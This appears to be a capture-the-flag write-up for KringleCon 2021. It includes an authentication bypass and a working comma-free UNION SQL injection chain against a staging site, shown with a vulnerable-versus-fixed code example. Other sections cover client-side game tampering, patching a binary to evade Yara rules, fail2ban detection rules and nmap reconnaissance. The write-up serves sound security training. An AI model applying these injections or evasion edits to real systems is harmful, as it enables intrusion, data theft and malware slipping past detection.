• Name: "Muffy VonDuchess Sebastian"
• Guest Info: Room 1024
• Troll ID: "I don't know. There were several of them"
• Description: "I have never, in my life, been in a facility with such horrible staff. They are rude and insulting. What kind of place is this? You can be sure that I (or my lawyer) will be speaking directly with Mr. Frost!"

With this information we modify the filter to require the "Evil Bit" and look for complaints associated with Room 1024, since room numbers are usually included in the guest_info form field:

ip.flags.rb==1 && http contains complaint && http.request.method==POST && urlencoded-form.value contains "1024"

This gives us the answer Flud, Hagg, and Yaqh. Typing this answer into the textbox on our badge under Objective 11 earns us the Reading Evil Packets achievement.

2.12 Objective 12 – Frost Tower Website Checkup

This objective is the first of the final two. It requires using the site's source code to bypass authentication and then SQL injection to retrieve data from a table. Ribb Bonbowford, in Santa's dining room, offers a hint after we solve The Elf Code game terminal:

• SQL Injection with Source – When you have the source code, API documentation becomes tremendously valuable.

After looking over the API documents, the first issue we find is an OWASP Top 10 problem, Identification and Authentication Failures (formerly Broken Authentication). The contact form handler below creates an authenticated session whenever the submitted email already exists in the database; the "Email Already Exists" branch is meant as an error, but it sets session.uniqueID before redirecting:

var rowlength = rows.length;
if (rowlength >= "1"){
    session = req.session;
    session.uniqueID = email;
    req.flash('info', 'Email Already Exists');
    res.redirect("/contact");
}
This means that after submitting an email address that already exists in the contact form we can reach the dashboard, search data and open account details without ever authenticating. That matters because the source also has a flaw in the detail logic of the /detail/:id endpoint: when the id parameter contains a comma, each piece is appended to the query as raw text (m.raw) instead of being bound as a parameter, so we can inject SQL through the URL.

if (reqparam.indexOf(',') > 0){
    var ids = reqparam.split(',');
    reqparam = "0";
    for (var i=0; i<ids.length; i++){
        query += tempCont.escape(m.raw(ids[i]));
        query += " OR id="
    }
    query += "?";
}else{
    query = "SELECT * FROM uniquecontact WHERE id=?"
}

There is one catch: because of the split(',') call, our payload cannot contain commas. We also know from the source code and API docs that the database is MySQL. First we find the number of columns with an ORDER BY probe; we get an error at 8, so there are seven columns to work with (not all of them are shown in the interface):

https://staging.jackfrosttower.com/detail/13,14 order by 8 --

Next we build a comma-free UNION SELECT of seven NULLs, joining seven single-column subqueries, to confirm the injection works:

https://staging.jackfrosttower.com/detail/13,14 union select * from (select NULL)a join (select NULL)b join (select NULL)c join (select NULL)d join (select NULL)e join (select NULL)f join (select NULL)g --

We get the two real contacts followed by a third row with empty fields except the two date columns, which is our injected NULL row:

s      email@email.com   123456   -Select-   January 6th, 2022 11:34:23   January 6th, 2022 6:21:10
abc    abc@abc.com       123      Algeria    January 6th, 2022 1:02:48    January 6th, 2022 6:21:10
                                             January 6th, 2022 6:21:10    January 6th, 2022 6:21:10

Now that we have a working query we can browse the database to find the data we need. We list all the schemas, then the tables in the right schema, then the columns in the right table, then the contents of the interesting column. (Some of this information is also available in the source code.)

Schemas/Databases:

https://staging.jackfrosttower.com/detail/13,14 union select * from (select NULL)a join (select NULL)b join (select schema_name from information_schema.schemata)c join (select NULL)d join (select NULL)e join (select NULL)f join (select NULL)g --
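The split-and-concatenate flaw and its fix, as an added Python example that is not the site's code. It models the handler against an in-memory SQLite database: the seven-column uniquecontact table and the todo table with its note column follow the writeup, the rows are constructed, and a small escape() stands in for the node mysql driver's client-side placeholder substitution, which is what lets the trailing "--" swallow the final " OR id=?" without a bind-count error. The comma-free JOIN trick from the page works in SQLite as well, so the exact payload above can be run; the information_schema steps are MySQL-only and are not modelled.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the encontact database: uniquecontact has the
    seven columns the ORDER BY probe revealed; all rows are constructed."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE uniquecontact(id INTEGER, name TEXT, email TEXT, phone TEXT,
                                   country TEXT, date_created TEXT, date_updated TEXT);
        INSERT INTO uniquecontact VALUES (13,'s','email@email.com','123456','-Select-','2022-01-06 11:34:23','2022-01-06 06:21:10');
        INSERT INTO uniquecontact VALUES (14,'abc','abc@abc.com','123','Algeria','2022-01-06 01:02:48','2022-01-06 06:21:10');
        CREATE TABLE todo(id INTEGER, note TEXT, completed INTEGER);
        INSERT INTO todo VALUES (1,'Force Santa to cancel Christmas',0);
        INSERT INTO todo VALUES (2,'offer the old man a job as a clerk in the Frost Tower Gift Shop',0);
    """)
    return con


def escape(value):
    """Client-side value formatting in the style of the node mysql driver:
    numbers pass through, strings are quoted. Enough for this example."""
    if isinstance(value, (int, float)):
        return str(value)
    return "'" + str(value).replace("'", "''") + "'"


def detail_vulnerable(con, reqparam):
    """Port of the flawed handler: with a comma in the id list every piece is
    concatenated raw (m.raw) and only the trailing placeholder is bound."""
    query = "SELECT * FROM uniquecontact WHERE id="
    if reqparam.find(",") > 0:
        for one_id in reqparam.split(","):
            query += one_id              # no escaping at all
            query += " OR id="
        query += "?"
        reqparam = "0"
    else:
        query = "SELECT * FROM uniquecontact WHERE id=?"
    # The driver substitutes '?' textually, so a trailing '--' that comments
    # out ' OR id=?' does not produce a bind-count error.
    sql = query.replace("?", escape(reqparam), 1)
    return con.execute(sql).fetchall()


def detail_fixed(con, reqparam):
    """Hardened handler: every id must parse as an integer and every id is bound."""
    ids = [int(x) for x in reqparam.split(",")]     # ValueError on anything else
    marks = ",".join("?" for _ in ids)
    return con.execute(f"SELECT * FROM uniquecontact WHERE id IN ({marks})", ids).fetchall()


# The comma-free UNION from the writeup: JOINed single-column subqueries give
# seven columns without a single comma reaching split(',').
NOTES_PAYLOAD = ("13,14 union select * from (select NULL)a join (select NULL)b "
                 "join (select note from todo)c join (select NULL)d "
                 "join (select NULL)e join (select NULL)f join (select NULL)g --")


def column_count(con, maximum=10):
    """Repeat the ORDER BY n probe until the database complains."""
    for n in range(1, maximum + 1):
        try:
            detail_vulnerable(con, f"13,14 order by {n} --")
        except sqlite3.OperationalError:
            return n - 1
    return maximum


def leaked_notes(con):
    """Rows whose id is NULL come from the injected SELECT; the note lands in
    the third column, where the page displayed it."""
    return sorted(row[2] for row in detail_vulnerable(con, NOTES_PAYLOAD) if row[0] is None)
```

detail_fixed raises on the payload instead of running it, and because the ids are bound individually the comma restriction that shaped the attack simply disappears: the handler no longer needs to build SQL from strings at all.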
Results:

• information_schema
• encontact

Tables in the encontact database:

https://staging.jackfrosttower.com/detail/13,14 union select * from (select NULL)a join (select NULL)b join (select table_name from information_schema.tables where table_schema = "encontact")c join (select NULL)d join (select NULL)e join (select NULL)f join (select NULL)g --

Results:

• users
• todo
• emails
• uniquecontact

Columns in the todo table:

https://staging.jackfrosttower.com/detail/13,14 union select * from (select NULL)a join (select NULL)b join (select column_name from information_schema.columns where table_name = "todo")c join (select NULL)d join (select NULL)e join (select NULL)f join (select NULL)g --

Results:

• id
• note
• completed

Notes from the todo table:

https://staging.jackfrosttower.com/detail/13,14 union select * from (select NULL)a join (select NULL)b join (select note from encontact.todo)c join (select NULL)d join (select NULL)e join (select NULL)f join (select NULL)g --

Results:

• Buy up land all around Santa's Castle
• Build bigger and more majestic tower next to Santa's
• Erode Santa's influence at the North Pole via FrostFest, the greatest Con in history
• Dishearten Santa's elves and encourage defection to our cause
• Steal Santa's sleigh technology and build a competing and way better Frosty present delivery vehicle
• Undermine Santa's ability to deliver presents on 12/24 through elf staff shortages, technology glitches, and assorted mayhem
• Force Santa to cancel Christmas
• SAVE THE DAY by delivering Frosty presents using merch from the Frost Tower Gift Shop to children world-wide...so the whole world sees that Frost saved the Holiday Season!!!! Bwahahahahaha!
• With Santa defeated, offer the old man a job as a clerk in the Frost Tower Gift Shop so we can keep an eye on him

After retrieving this data, we have the answer we need. Entering the word clerk into the badge under Objective 12 completes the challenge and gives us the Frost Tower Website Checkup achievement.

2.13 Objective 13 – FPGA Programming

In this final challenge, we are tasked with writing a Verilog module that outputs tones of given frequencies as a square wave.
We are given the following hints by Grody Goiterson:

• FPGA Talk – Prof. Qwerty Petabyte is giving a lesson about Field Programmable Gate Arrays (FPGAs).
• FPGA for Fun – There are FPGA enthusiast sites.

The following code solves the challenge for all required frequencies. One hint that should have been given: if you have a reset, you need to take into account the leading edge of the wave and start the count at one less than you would when counting up without a reset.

module tone_generator (
    input clk,
    input rst,
    input [31:0] freq,
    output wave_out
);
    reg [31:0] counter;
    reg [31:0] top;
    reg tone;
    real limit = 125000000.0/(freq*2/100);   // get a real number with the correct endpoint for the loop

    assign wave_out = tone;

    always @(posedge clk or posedge rst) begin
        counter <= 0;
        if (rst == 1) begin
            counter <= -1;                  // take into account the leading edge on reset
            tone <= 0;
        end
        else if ($rtoi(limit * 10) - ($rtoi(limit) * 10) > 4)   // round real to integer correctly
            top <= $rtoi(limit) + 1;
        else
            top <= $rtoi(limit);
        begin
            if (counter >= top) begin
                counter <= 1;
                tone <= tone ^ 1'b1;        // toggle tone between 1 and 0
            end
            else
                counter <= counter + 1;     // increment counter each clock cycle
        end
    end
endmodule

After finishing the code and passing all the tests, you can press the Program Device button to finish the final objective of KringleCon 2021. You are awarded the FPGA Programming achievement and given an FPGA, which lets you finish the game's narrative.

2.14 End Game

After finishing the last objective, you are given an FPGA. You can plug it into the Speak & Spell on the table near Crunchy Squisher, the device she is building on the rooftop of Jack Frost Tower. When the FPGA is plugged in, music plays, a spaceship descends and you are awarded the Open the Spaceship's Door achievement. You can enter the spaceship and explore the dialog options of the characters from right to left. When you finish the dialog with Santa you are awarded the You Won! achievement and the credits roll.

3 Terminals

3.1 Exif Metadata

Talking to Piney Sappington and opening the terminal, we find that we need exiftool to determine which of a number of Word .docx files has been modified. Going by the exiftool man page and looking at a handful of documents in the directory, the answer will most likely be in the Last Modified By metadata tag. We can show this tag for all documents at once by running exiftool -LastModifiedBy *.

HELP! That wily Jack Frost modified one of our naughty/nice records, and right before Christmas! Can you help us figure out which one? We've installed exiftool for your convenience!
Filename (including .docx extension) >

elf@04b8e74236db:~$ exiftool -LastModifiedBy *
…
======== 2021-12-20.docx
Last Modified By                : Santa Claus
======== 2021-12-21.docx
Last Modified By                : Jack Frost
======== 2021-12-22.docx
Last Modified By                : Santa Claus
…
   25 image files read
elf@04b8e74236db:~$

Entering 2021-12-21.docx at the Filename (including .docx extension) > prompt solves the terminal and gives us the Document Analysis achievement. It also unlocks the three hints used for Objective 2, Where in the World is Caramel Santaigo?

3.2 Grepping for Gold

This challenge requires you to answer a number of questions by searching a greppable nmap output file with grep. The following hint is given by Greasy GopherGuts if you talk to him before completing the challenge:

• Grep Cheat Sheet – Check this out if you need a grep refresher.

Howdy howdy! Mind helping me with this homew- er, challenge? Someone ran nmap -oG on a big network and produced this bigscan.gnmap file. The quizme program has the questions and hints and, incidentally, has NOTHING to do with an Elf University assignment. Thanks!
Answer all the questions in the quizme executable:
- What port does 34.76.1.22 have open?
- What port does 34.77.207.226 have open?
- How many hosts appear "Up" in the scan?
- How many hosts have a web port open? (Let's just use TCP ports 80, 443, and 8080)
- How many hosts with status Up have no (detected) open TCP ports?
- What's the greatest number of TCP ports any one host has open?
Check out bigscan.gnmap and type quizme to answer each question.

1. What port does 34.76.1.22 have open? Answer: Port 62078
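The six questions can also be answered by parsing the grepable format properly instead of counting matching lines. The block below is an added Python example, not part of the original report: a small parser for nmap -oG Host lines (tab-separated Status, Ports and Ignored State sections, with each port written as port/state/protocol/owner/service/rpc/version) applied to a constructed excerpt of bigscan.gnmap. The two 34.x hosts mirror the page's grep output; the 10.0.0.x hosts are made up to exercise each question.

```python
from collections import defaultdict

# Constructed bigscan.gnmap excerpt (not the real file). nmap -oG separates
# the sections of a Host line with tabs.
SAMPLE_GNMAP = "\n".join([
    "# Nmap 7.70 scan initiated Thu Dec  2 16:00:00 2021 as: nmap -oG bigscan.gnmap ...",
    "Host: 34.76.1.22 ()\tStatus: Up",
    "Host: 34.76.1.22 ()\tPorts: 62078/open/tcp//iphone-sync///\tIgnored State: closed (999)",
    "Host: 34.77.207.226 ()\tStatus: Up",
    "Host: 34.77.207.226 ()\tPorts: 8080/open/tcp//http-proxy///\tIgnored State: filtered (999)",
    "Host: 10.0.0.3 ()\tStatus: Up",
    "Host: 10.0.0.4 ()\tStatus: Up",
    "Host: 10.0.0.4 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///\tIgnored State: closed (997)",
    "Host: 10.0.0.5 ()\tStatus: Up",
    "Host: 10.0.0.5 ()\tPorts: 80/open/tcp//http///, 8080/open/tcp//http-proxy///, 3306/filtered/tcp//mysql///\tIgnored State: closed (997)",
    "Host: 10.0.0.6 ()\tStatus: Down",
    "# Nmap done at Thu Dec  2 16:30:00 2021 -- 6 IP addresses (5 hosts up) scanned",
])


def parse_gnmap(text):
    """Return {ip: {"up": bool, "open_tcp": set of ports}}. A host has a Status
    line and, when something was not in the ignored state, a Ports line; only
    entries whose state is 'open' and protocol 'tcp' count as open TCP ports."""
    hosts = defaultdict(lambda: {"up": False, "open_tcp": set()})
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue
        sections = line.split("\t")
        ip = sections[0].split()[1]
        for section in sections[1:]:
            if section == "Status: Up":
                hosts[ip]["up"] = True
            elif section.startswith("Ports: "):
                for entry in section[len("Ports: "):].split(", "):
                    port, state, proto = entry.split("/")[:3]
                    if state == "open" and proto == "tcp":
                        hosts[ip]["open_tcp"].add(int(port))
    return dict(hosts)


def open_ports(hosts, ip):
    return sorted(hosts[ip]["open_tcp"]) if ip in hosts else []


def count_up(hosts):
    return sum(1 for h in hosts.values() if h["up"])


def count_web(hosts, web_ports=(80, 443, 8080)):
    return sum(1 for h in hosts.values() if h["open_tcp"] & set(web_ports))


def count_up_no_open(hosts):
    return sum(1 for h in hosts.values() if h["up"] and not h["open_tcp"])


def max_open(hosts):
    return max(len(h["open_tcp"]) for h in hosts.values())


def quiz(text):
    """Answer the six quizme questions for the given gnmap text."""
    hosts = parse_gnmap(text)
    return {
        "34.76.1.22": open_ports(hosts, "34.76.1.22"),
        "34.77.207.226": open_ports(hosts, "34.77.207.226"),
        "up": count_up(hosts),
        "web": count_web(hosts),
        "up_no_open": count_up_no_open(hosts),
        "max_open": max_open(hosts),
    }
```

One difference from the grep approach is worth knowing: subtracting the number of Ports lines from the number of Up hosts treats every Ports line as "has an open port", but a host whose only non-ignored ports are filtered (10.0.0.5's 3306 above would be such a case if it had nothing else open) also gets a Ports line. The parser checks the state field, so it is not fooled by that.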
2. What port does 34.77.207.226 have open? Answer: Port 8080
3. How many hosts appear "Up" in the scan? Answer: 26054
4. How many hosts have a web port open? (Let's just use TCP ports 80, 443, and 8080) Answer: 14372
5. How many hosts with status Up have no (detected) open TCP ports? Answer: 402
6. What's the greatest number of TCP ports any one host has open? Answer: 12

The grep commands used for questions 1 to 6:

elf@3b10b69e686d:~$ grep 34.76.1.22 bigscan.gnmap
Host: 34.76.1.22 ()	Status: Up
Host: 34.76.1.22 ()	Ports: 62078/open/tcp//iphone-sync///	Ignored State: closed (999)
elf@3b10b69e686d:~$ grep 34.77.207.226 bigscan.gnmap
Host: 34.77.207.226 ()	Status: Up
Host: 34.77.207.226 ()	Ports: 8080/open/tcp//http-proxy///	Ignored State: filtered (999)
elf@3b10b69e686d:~$ grep Up bigscan.gnmap | cut -f 2 -d ' ' | sort | uniq | wc -l
26054
elf@3b10b69e686d:~$ grep -E '\s80/open|\s443/open|\s8080/open' bigscan.gnmap | wc -l
14372
elf@23d6ee396138:~$ expr `echo $(grep Up bigscan.gnmap | wc -l) - $(grep Ports: bigscan.gnmap | wc -l)`
402
elf@23d6ee396138:~$ grep -o -E 'Ports:.*///\s' bigscan.gnmap | grep -o -n 'open' | uniq -c | sort | tail -1
     12 5886:open

After answering all the questions correctly, you earn the Grepping for Gold! achievement and the hints for Objective 3 from Greasy GopherGuts.

3.3 Logic Munchers

There are two ways to solve this game, and Noel Boetie gives us the following hints:

• Boolean Logic – There are lots of special symbols for logic and set notation. This one covers AND, NOT, and OR at the bottom.
• AND, OR, NOT, XOR – This might be a handy reference too.

You can either play the game and complete an Intermediate stage in Potpourri or higher, or you can tweak the game's JavaScript so that every stage is won automatically. There are a few ways to do this. First, we can change the code in Chompy.js so we don't lose lives when we eat a false expression: in the chompy class, the die() function can be changed to add a life instead of removing one whenever we die or eat a false expression.
This change lets us pass each level quickly by eating every expression until all the true ones are gone. We can also set the sleep time to 0 so we don't have to wait two seconds after each death.

...
die() { // when a player eats the wrong thing or gets eaten
    lives += 1; // reduce life count (changed: now increases it)
...
chompySleepTime = new Date().getTime() + 0 // set wake time 2 sec in future (changed to 0)
...

The easiest way to beat this challenge is to invert the logic of the function that checks whether a stage still has true statements left. Change if (!workToDo) to if (workToDo); upon saving this change in Chrome Developer Tools, each stage is won immediately upon entering it.

...
function checkWin() // check to see if the stage has been won
...
    if (workToDo) // work's all done? Stage up!
...

Because of the number of expressions, winning the game legitimately is not covered in this assessment, but for those unfamiliar with these types of boolean expressions, the game should be played and not circumvented. The Logic Munchers achievement is awarded for completing this terminal and Noel Boetie gives you hints for Objective 4.

3.4 IPv6 Sandbox

The objective of this challenge is to find the password for a candy striper. The candy striper runs as a service on a system in an IPv6 network, and a web service on another host holds the password. We must use commands such as netcat, nmap, ping and curl to find the right IPv6 address and obtain the password. Jewel Loggins gives a single hint for this challenge:

• IPv6 Reference – Check out this GitHub Gist with common tools used in an IPv6 context.

Tools:
  * netcat
  * nmap
  * ping / ping6
  * curl

Welcome, KringleCon attendee! The candy striper is running as a service on this terminal, but I can't remember the password. Like a sticky note under the keyboard, I put the password on another machine in this network. Problem is: I don't have the IP address of that other host. Please do what you can to help me out. Find the other machine, retrieve the password, and enter it into the Candy Striper in the pane above. I know you can get it running again!

The first thing we do is find the other link-local addresses on our network segment, by pinging the all-nodes multicast address ff02::1:

elf@9e1d8554e176:~$ ping6 -c2 ff02::1
PING ff02::1(ff02::1) 56 data bytes
64 bytes from fe80::42:c0ff:fea8:a003%eth0: icmp_seq=1 ttl=64 time=0.035 ms
64 bytes from fe80::42:d7ff:fe9d:1bd%eth0: icmp_seq=1 ttl=64 time=0.035 ms (DUP!)
64 bytes from fe80::42:c0ff:fea8:a002%eth0: icmp_seq=1 ttl=64 time=0.035 ms (DUP!)
64 bytes from fe80::42:c0ff:fea8:a003%eth0: icmp_seq=1 ttl=64 time=0.035 ms

--- ff02::1 ping statistics ---
2 packets transmitted, 2 received, +2 duplicates, 0% packet loss, time 18ms
rtt min/avg/max/mdev = 0.035/0.053/0.077/0.018 ms
Examining our own interfaces, we see that fe80::42:c0ff:fea8:a003 is our local system, so two of the replies are our own. We scan the other two addresses with nmap to see what services they run (note the %eth0 zone suffix needed for link-local addresses):

elf@9e1d8554e176:~$ nmap -6 -T 5 --top-ports 250 fe80::42:d7ff:fe9d:1bd%eth0
Starting Nmap 7.70 ( https://nmap.org ) at 2022-01-03 18:04 UTC
Nmap scan report for fe80::42:d7ff:fe9d:1bd
Host is up (0.000087s latency).
Not shown: 248 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 13.04 seconds
elf@9e1d8554e176:~$ nmap -6 -T 5 --top-ports 250 fe80::42:c0ff:fea8:a002%eth0
Starting Nmap 7.70 ( https://nmap.org ) at 2022-01-03 18:04 UTC
Nmap scan report for fe80::42:c0ff:fea8:a002
Host is up (0.000091s latency).
Not shown: 248 closed ports
PORT     STATE SERVICE
80/tcp   open  http
9000/tcp open  cslistener

Nmap done: 1 IP address (1 host up) scanned in 13.04 seconds

Next we use curl against port 80 of the a002 host, the only one that appears to serve anything web-like:

elf@9e1d8554e176:~$ curl http://[fe80::42:c0ff:fea8:a002]:80/ --interface eth0
<html>
<head><title>Candy Striper v6</title></head>
<body>
<marquee>Connect to the other open TCP port to get the striper's activation phrase!</marquee>
</body>
</html>

Okay. Let's connect to the other open port to get the striper's activation phrase, again with curl:

elf@9e1d8554e176:~$ curl http://[fe80::42:c0ff:fea8:a002]:9000/ --interface eth0
PieceOnEarth

Now we have the phrase to engage the candy striper and can enter it in the answer pane:

ENTER THE CORRECT PHRASE TO ENGAGE THE CANDY STRIPER > PieceOnEarth
Your answer: PieceOnEarth
Checking…
CANDY STRIPER REENGAGED. THANK YOU!

Entering the correct phrase solves the challenge. We receive the hints from Jewel Loggins for Objective 5 and the IPv6 Sandbox achievement.

3.5 Holiday Hero

This terminal is a Guitar Hero style game. To complete the achievement you must get the sleigh's fuel over 80%. You can do this by playing a two-player game as the primary player on the left, or by enabling single-player mode and filling the sleigh past 80% on your own. Chimney Scissorsticks gives only one hint for this game, and it does not persist in the badge's hint area. The hint is as follows:
• Untitled Hint – There's a clever way to enable single player mode. It can be enabled by fiddling with two client-side values. One of which is passed on to the server.

The first value is in the application's cookies. The cookie is named HOHOHO and has the value %7B%22single_player%22%3Afalse%7D, which is the URL-encoded JSON {"single_player":false}. We change it to %7B%22single_player%22%3Atrue%7D. After changing the cookie and entering the room, you can start a game by yourself, but the other player's buttons are not pressed automatically as they should be. To remedy this, we also set the JavaScript variable single_player_mode to true before the game starts. This is done from Sources → Console, selecting hero.kringlecastle.com as the context and typing single_player_mode=true in the console after creating a room but before the game begins. This was done by setting a breakpoint on the first line shown below. You can now play the game and the player-two buttons are counted as correct, with animations during the game showing that they register. After completing the game as a single player, you receive the Holiday Hero achievement.

3.6 HoHo...No

In this challenge you are asked to configure fail2ban with custom rules. This requires you to create a fail2ban filter file, an action file and a jail file. The instructions for this terminal are shown below.
Jack is trying to break into Santa’s workshop! Santa’s elves are working 24/7 to manually look through logs, identify the malicious IP addresses, and block them. We need your help to automate this so the elves can get back to making presents!

Can you configure Fail2Ban to detect and block the bad IPs?

* You must monitor for new log entries in /var/log/hohono.log
* If an IP generates 10 or more failure messages within an hour then it must be added to the naughty list by running naughtylist add <ip>
    /root/naughtylist add 12.34.56.78
* You can also remove an IP with naughtylist del <ip>
    /root/naughtylist del 12.34.56.78
* You can check which Ips are currently on the naughty list by running /root/naughtylist list

You’ll be rewarded if you correctly identify all the malicious IPs with a Fail2Ban filter in /etc/fail2ban/filter.d, and action to ban and unban in /etc/fail2ban/action.d, and a custom jail in /etc/fail2ban/jail.d.

Don’t add any nice IPs to the naughty list!

*** IMPORTANT NOTE! ***
Fail2Ban won’t rescan any logs it has already seen. That means it won’t automatically process the log file each time you make changes to the Fail2Ban config. When needed, run /root/naughtylist refresh to re-sample the log file And tell Fail2Ban to reproccess it.

The first thing we should do is filter the log file to find the common types of bad log entries so we can build our patterns. This can be done using standard Linux tools: strip the timestamp fields, replace IP addresses and user names with placeholders, and deduplicate what remains.

root@fe3682bbf503:~# cat /var/log/hohono.log | grep -v success | grep -v Valid | cut -f 3- -d ' ' | sed -e 's/[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}/x.x.x.x/g' | sed -e 's/alpha\|bravo\|charlie\|delta/xxxxxx/g' | sed -e 's/for [a-z]\+/for xxxxxx/g' | sort | uniq
Failed login from x.x.x.x for xxxxxx
Invalid heartbeat 'xxxxxx' from x.x.x.x
Login from x.x.x.x rejected due to unknown user name
x.x.x.x sent a malformed request

Now that we have patterns for the logs we are looking for, let's start by developing our filter file. This file lives in the fail2ban /etc directory under filter.d/santa.conf and matches every log line that fits one of the four patterns, with <HOST> capturing the offending IP:

[Definition]
failregex = ^.* <HOST> sent a malformed request$
            ^.* Login from <HOST> rejected due to unknown user name$
            ^.* Invalid heartbeat '\w+' from <HOST>$
            ^.* Failed login from <HOST> for \w+$

Next we add the actions for what we want fail2ban to do when it finds that an IP address has violated our rules. This goes in the fail2ban /etc directory under action.d/santa.conf:

[Definition]
actionstart = /root/naughtylist refresh
actionban = /root/naughtylist add <ip>
actionunban = /root/naughtylist del <ip>

Finally, we need to develop a custom jail that tells fail2ban where to find our log file, filter, and action definitions, and that sets the rules/windows for detection, banning, and unbanning. That file is located in the fail2ban /etc directory under jail.d/santa.conf.
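As an added example (not the report's or the challenge's own code), the Python below re-implements the four failregex patterns above together with the thresholds the challenge sets (10 failures within an hour) over a constructed hohono.log excerpt; it assumes each line starts with a YYYY-MM-DD HH:MM:SS timestamp and substitutes an IPv4-only pattern for fail2ban's <HOST>. It shows why the window matters: a host that fails slowly never trips the jail, and success lines never count.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed line shape: "YYYY-MM-DD HH:MM:SS <message>" (the report's pipeline
# drops the first two space-separated fields before it looks at the message).
TS_FORMAT = "%Y-%m-%d %H:%M:%S"
# fail2ban expands <HOST> itself; an IPv4-only stand-in lets plain re run the patterns.
HOST = r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})"
FAILREGEX = [re.compile(p.replace("<HOST>", HOST)) for p in (
    r"^.* <HOST> sent a malformed request$",
    r"^.* Login from <HOST> rejected due to unknown user name$",
    r"^.* Invalid heartbeat '\w+' from <HOST>$",
    r"^.* Failed login from <HOST> for \w+$",
)]

def match_failure(line):
    """Return the offending IP if the line matches any failregex, else None."""
    for rx in FAILREGEX:
        m = rx.match(line)
        if m:
            return m.group("host")
    return None

def naughty_ips(lines, maxretry=10, findtime=timedelta(hours=1)):
    """Return the IPs the jail would ban: maxretry failures inside one findtime window."""
    recent = defaultdict(deque)          # per-IP failure timestamps still in window
    banned = []
    for line in sorted(lines):           # ISO timestamps sort chronologically
        ip = match_failure(line)
        if ip is None or ip in banned:
            continue
        ts = datetime.strptime(line[:19], TS_FORMAT)
        window = recent[ip]
        window.append(ts)
        while ts - window[0] > findtime:  # drop failures older than findtime
            window.popleft()
        if len(window) >= maxretry:
            banned.append(ip)
    return banned

def build_sample():
    """Constructed hohono.log excerpt: one attacker, one slow noisy host whose
    failures never reach 10 in an hour, and a nice IP that only succeeds."""
    base = datetime(2021, 12, 20, 10, 0, 0)
    stamp = lambda m: (base + timedelta(minutes=m)).strftime(TS_FORMAT)
    lines = [f"{stamp(3 * i)} Failed login from 12.34.56.78 for alpha" for i in range(10)]
    lines += [f"{stamp(20 * i)} Invalid heartbeat 'bravo' from 10.0.0.9" for i in range(10)]
    lines += [f"{stamp(i)} Login from 192.168.1.5 for charlie success" for i in range(20)]
    return lines
```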
The jail file, jail.d/santa.conf:

[santa_jail]
enabled = true
logpath = /var/log/hohono.log
findtime = 1h
maxretry = 10
bantime = 1h
filter = santa
action = santa

Now we can restart fail2ban and it will automatically detect all the bad hosts and block them.

root@fe3682bbf503:~/etc/fail2ban/jail.d# service fail2ban restart
 * Restarting Authentication failure monitor fail2ban
Log file refreshed! It may take fail2ban a few moments to re-process
144.115.185.234 has been added to the naughty list!
222.132.239.194 has been added to the naughty list!
...
***********************************************************************
* You stopped the attacking systems! You saved our systems!           *
* Thank you for all of your help. You are a talented defender!        *
***********************************************************************

Upon completing this challenge, we can talk with Eve Snowshoes to get hints for Objective 8 – Kerberoasting on an Open Fire. We also receive the HoHo...No achievement.

3.7 Yara Analysis

This terminal challenge requires you to modify an executable so that it executes without being caught by Yara rules. No hints were given for this challenge besides those in the dialog with Fitzy Shortstack. Solving this challenge earns you hints for the Splunk objective from Fitzy. The terminal greets us with the following:

HELP!!! This critical application is supposed to tell us the sweetness levels of our candy manufacturing output (among other important things), but I can't get it to run. It keeps saying something something yara. Can you take a look and see if you can help get this application to bypass Sparkle Redberry's Yara scanner?

If we can identify the rule that is triggering, we might be able change the program to bypass the scanner.

We have some tools on the system that might help us get this application going: vim, emacs, nano, yara, and xxd

The children will be very disappointed if their candy won't even cause a single cavity.

Upon executing the program the first time we find the following:

snowball2@5a4e406f3ee8:~$ ls
the_critical_elf_app  yara_rules
snowball2@5a4e406f3ee8:~$ ./the_critical_elf_app
yara_rule_135 ./the_critical_elf_app

Examining Yara rule 135, we find it shows the following.
rule yara_rule_135
{
    meta:
        description = "binaries - file Sugar_in_the_machinery"
        author = "Sparkle Redberry"
        reference = "North Pole Malware Research Lab"
        date = "1955-04-21"
        hash = "19ecaadb2159b566c39c999b0f860b4d8fc2824eb648e275f57a6dbceaf9b488"
    strings:
        $s = "candycane"
    condition:
        $s
}

We can use vim and xxd to edit the file and modify the string candycane to get the executable past rule 135:

00002000: 0100 0200 0000 0000 6361 6e64 7963 616d  ........candycam
00002010: 6500 6e61 7567 6874 7920 7374 7269 6e67  e.naughty string

After making this change and rerunning the application we get the following result:

snowball2@5a4e406f3ee8:~$ ./the_critical_elf_app
yara_rule_1056 ./the_critical_elf_app

Examining rule 1056 we find:

rule yara_rule_1056
{
    meta:
        description = "binaries - file frosty.exe"
        author = "Sparkle Redberry"
        reference = "North Pole Malware Research Lab"
        date = "1955-04-21"
        hash = "b9b95f671e3d54318b3fd4db1ba3b813325fcef462070da163193d7acb5fcd03"
    strings:
        $s1 = {6c 6962 632e 736f 2e36}
        $hs2 = {726f 6772 616d 2121}
    condition:
        all of them
}

This rule is looking for two specific hex strings, and both of them must match in order for this rule to be activated. Let's edit our file again in vim with xxd. The first string, 6c 6962 632e 736f 2e36 (libc.so.6), is a reference to a Linux shared library, so it probably can't be changed:

00000450: 0000 0000 0000 0000 006c 6962 632e 736f  .........libc.so
00000460: 2e36 005f 5f63 7861 5f66 696e 616c 697a  .6.__cxa_finaliz

The next hex string, 726f 6772 616d 2121 (rogram!!), looks like a candidate:

00002050: 6973 2070 726f 6772 616d 2121 0000 0000  is program!!....
00002060: 486f 6c69 6461 7948 6163 6b43 6861 6c6c  HolidayHackChall

We can change the first 21 to a 23 to change !! into #!, and that should get us past rule 1056. Sure enough, upon execution we find the following:

snowball2@5a4e406f3ee8:~$ ./the_critical_elf_app
yara_rule_1732 ./the_critical_elf_app

Now we need to bypass rule 1732. Let's look at the rule:
